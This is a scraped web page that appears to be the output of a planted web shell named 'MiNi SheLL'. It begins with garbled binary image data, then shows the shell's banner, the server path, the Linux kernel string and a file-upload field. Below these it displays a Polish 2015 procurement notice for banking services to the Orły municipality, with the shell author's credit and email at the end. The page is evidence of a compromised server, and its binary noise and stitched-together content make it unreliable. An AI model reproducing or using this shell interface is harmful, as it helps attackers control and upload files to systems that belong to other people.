JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150204/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20150204/15303-N-2015.html

<p class="kh_header"><b>Orły: Obsługa bankowa budżetu Gminy Orły i jej jednostek organizacyjnych w okresie od dnia 1.03.2015 r. do dnia 28.02.2019r.</b><br>
<b>Numer ogłoszenia: 15303 - 2015; data zamieszczenia: 04.02.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Orły , ul. Przemyska 3, 37-716 Orły, woj. podkarpackie, tel. 16 6712693, 6712694, faks 16 736 24 34.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.ugorly .pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Obsługa bankowa budżetu Gminy Orły i jej jednostek organizacyjnych w okresie od dnia 1.03.2015 r. do dnia 28.02.2019r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest kompleksowa bankowa obsługa budżetu Gminy Orły oraz jednostek organizacyjnych objętych budżetem Gminy. Uwzględniając charakter 
i złożoność budżetu gminy i jej jednostek organizacyjnych, na zakres usługi mieszczącej się w przedmiocie zamówienia, wchodzić będzie:
Prowadzenie rachunku bieżącego i rachunków pomocniczych Urzędu Gminy Orły,     Gminy Orły oraz rachunków bieżących i pomocniczych jednostek organizacyjnych gminy:
a    Gminnego Zakładu Usług Wodnych 
b.   Gminnej Biblioteki Publicznej
c.   Gminnego Zespołu Ekonomiczno-Administracyjnego Szkół
d.   Gminnego Ośrodka Pomocy Społecznej
1.  Transport gotówki do  banku oraz z banku do kasy Urzędu Gminy - średnio  2 razy w tygodniu.
2.  Oprocentowanie środków na rachunku.
3.  Przyjmowanie wpłat gotówkowych.
4.  Dokonywanie wypłat gotówkowych na rzecz posiadacza rachunku oraz obsługa kasowa GOPS 
5.  W ramach elektronicznej obsługi bankowej posiadacz rachunku będzie miał zapewnione bez opłat i prowizji w szczególności:
-   zainstalowanie i wdrożenie systemu elektronicznej obsługi rachunków 
w standardzie zapewniającym pełne bezpieczeństwo, zgodnie z przepisami   prawa, jednolitego dla wszystkich jednostek wymienionych w pkt 1
-  dostępność systemu bankowości internetowej w każdym  dniu roboczym przez 24 godziny,
- uzyskiwanie w czasie rzeczywistym wiadomości o wszystkich operacjach 
i saldach na rachunku bieżącym i rachunkach pomocniczych,
- przeszukiwanie zbiorów wszystkich operacji na wszystkich rachunkach,
- eksport przelewów przygotowanych we własnych systemach informatyczno - finansowych do systemu elektronicznej obsługi rachunków bankowych 
w formacje umożliwiającym wczytanie tych danych,
- generowanie wydruków wyciągów bankowych nie wymagających stempla bankowego,
- przechowywanie wysłanych przelewów w archiwum systemu co najmniej 
3 miesiące,
-przeszkolenie pracowników zamawiającego w zakresie obsługi systemu,
-zapewnienie dostępu do pomocy technicznej w zakresie obsługi elektronicznej obsługi rachunków,
-potwierdzenie w formie elektronicznej realizacji polecenia przelewu,
-dostarczanie przez bank wyciągów bankowych w formie elektronicznej 
z każdego dnia najpóźniej do godz. 10°° dnia następnego,
-zapewnienie pełnej i ciągłej sprawności systemu elektronicznej obsługi rachunków bankowych w całym okresie trwania umowy,
-ponoszenie odpowiedzialności materialnej za błędy funkcjonowania systemu 
w całym okresie trwania umowy.
8. Informacja na temat możliwości powierzenia przez wykonawcę wykonania części lub całości zamówienia podwykonawcom - zamawiający nie dopuszcza powierzenia zamówienia podwykonawcom.
9. Zamawiający nie dopuszcza możliwości składania ofert wariantowych.
10.Przedmiotem niniejszego postępowania nie jest zawarcie umowy ramowej.
11. Zamawiający dopuszcza możliwość udzielenia zamówień uzupełniających oraz zmianę istotnych postanowień umowy.
12.  Wymagania dotyczące realizacji przedmiotu zamówienia:
12.1.Wymagana jest należyta staranność przy realizacji zobowiązań umowy.
12.2.Ustalenia i decyzje dotyczące wykonywania zamówienia uzgadniane będą przez zamawiającego z ustanowionym przedstawicielem wykonawcy.
12.3.Określenie przez Wykonawcę telefonów kontaktowych i numerów fax. Oraz innych ustaleń niezbędnych dla sprawnego i terminowego wykonania zamówienia.
12.4.Z uwagi na zamiar przeniesienia wypłat  GOPS ( wypłaty gotówkowe ) do siedziby Wykonawcy ( dotychczasowe wypłaty realizowane były w kasie zamawiającego ), zamawiający oczekuje od wykonawcy utworzenia w okresie do trzech miesięcy od podpisania umowy w granicach administracyjnych miejscowości Orły oddziału, filii, z punktem kasowym i utrzymanie jego funkcjonowania przez okres nie krótszy niż określony w umowie dotyczącej obsługi budżetu. Zarówno w okresie przejściowym trzech miesięcy jak i w całym okresie trwania umowy, wykonawca będzie musiał zapewnić codzienną obsługę budżetu gminy w granicach miejscowości  j.w.
12.5. Zamawiający określa podstawowe dane do obliczenia ceny oferty:

1.Gmina Orły
Liczba prowadzonych rachunków bankowych wg stanu na dzień 31.12.2014 r., w tym:	15
Urząd Gminy ( bez jednostek )	4
Gmina Orły ( bez jednostek )	11
Orientacyjna ilość dzienna przelewów 
W tym przelewy do innych banków
W tym przelewy do innych banków
z rachunku Urzędu Gminy           40
                                                   2
z rachunku Gminy                         5
                                                     0
Przewidywana ilość rachunków po dniu 01.01.2015 r., w tym:	18
Urząd Gminy
	4
Gmina Orły
	14
Przewidywana wysokość budżetu na 2015 r.
Urzędu Gminy 12 138 799,00
Gminy Orły 24 807 539,00
Przewidywana wysokość budżetu na 2016 r.	
Urzędu Gminy 12 502 942,00
Gminy Orły      25 551 765,00
Przewidywana wysokość budżetu na 2017 r./2018 r.	
Urzędu Gminy 12 072 100,00
Gminy Orły  21 594 683,00
Przewidywana średnia wysokość obrotu gotówkowego w miesiącu	
Urzędu Gminy 150 000,00
Gminy Orły  0,00
2.Gminny Ośrodek Pomocy Społecznej
Liczba prowadzonych rachunków bankowych wg stanu na dzień 31.12.2014 r.	4
Orientacyjna ilość dzienna przelewów 40
W tym przelewy do innych banków	20
Przewidywana ilość rachunku po dniu 1.01.2015r.	4
Przewidywana wysokość budżetu na 2015 r.	5 290 508,00
Przewidywana wysokość budżetu na 2016 r.	5 449 223,00
Przewidywana wysokość budżetu na 2017 :2018 r.	5 612 700,00
Średnia wysokość wypłat gotówkowych o charakterze socjalnym w miesiącu	170 000 ,00
Średnia ilość wypłat gotówkowych o charakterze socjalnym w miesiącu	300
3. Gminny Zakład Usług Wodnych
Liczba prowadzonych rachunków bankowych wg stanu na dzień 31.12.2014 r.	2
Orientacyjna ilość dzienna przelewów 15
W tym przelewy do innych banków	8
Przewidywana ilość rachunków po dniu 1.01.2015 r.	3
Przewidywana wysokość budżetu na 2015 r.	2 517 996,00
Przewidywana wysokość budżetu na 2016 r.	2 593 536,00
Przewidywana wysokość budżetu na 2017 r./2018 r.	2 671 342,00
Przewidywana średnia wysokość obrotu gotówkowego w miesiącu	  80.000,00
4.Gminny Zespół Ekonomiczno - Administracyjny Szkół
Liczba prowadzonych rachunków bankowych wg stanu na dzień 31.12.2014 r.	5
Orientacyjna ilość dzienna przelewów 25
W tym przelewy do innych banków	20
Przewidywana ilość rachunków po dniu 1.01.2015 r.	5
Przewidywana wysokość budżetu na 2015 r.	10 563 839,00
Przewidywana wysokość budżetu na 2016 r.	10 880 754,00
Przewidywana wysokość budżetu na 2017;2018 r.	11 207 176,00
Przewidywana średnia wysokość obrotu gotówkowego w miesiącu	 6000,00
5.Gminna Biblioteka Publiczna
Liczba prowadzonych rachunków bankowych wg stanu na dzień 31.10.2010 r.	2
Orientacyjna ilość dzienna przelewów 3
W tym przelewy do innych banków	2
Przewidywana ilość rachunków po dniu 1.01.2015 r.	2
Przewidywana wysokość budżetu na 2015 r.	225 268,00
Przewidywana wysokość budżetu na 2016 r.	232 026,00
Przewidywana wysokość budżetu na 2017 r./2018 r.	238 996,00
Przewidywana średnia wysokość obrotu gotówkowego w miesiącu	0,000.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 66.11.00.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.02.2019.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie ustanowiono</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  wymaga  aby Wykonawca posiadał; koncesję, zezwolenie lub licencję na prowadzenie usług bankowych w rozumieniu obowiązujących na terenie Rzeczypospolitej przepisów w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  wymaga  aby Wykonawca   udokumentował wiedzę i doświadczenie  poprzez wykaz wykonanej lub wykonywanych w okresie ostatnich trzech lat przed upływem terminu składania ofert przetargowych, co najmniej jednej usługi obejmującej kompleksową obsługę jednostki samorządowej, z podaniem jej wartości, daty wykonania, nazwy zamawiającego wraz z załączeniem dokumentu potwierdzającego, że usługi te zostały lub są realizowane należycie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie ustanowiono wymagań w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie ustanowiono wymagań w tym zakresie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie ustanowiono wymagań w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - oprocentowanie środków na rachunkach bankowych - 15</li>
<li>3 - cena transportu gotówki do kasy - 5</li>
</ul>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.ugorly.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Orły ul. Przemyska 3, 37-716 Orły pokój nr 10.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.02.2015 godzina 09:00, miejsce: Biuro Obsługi Mieszkańców Urząd Gminy Orły ul. Przemyska 3, 37-716 Orły.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com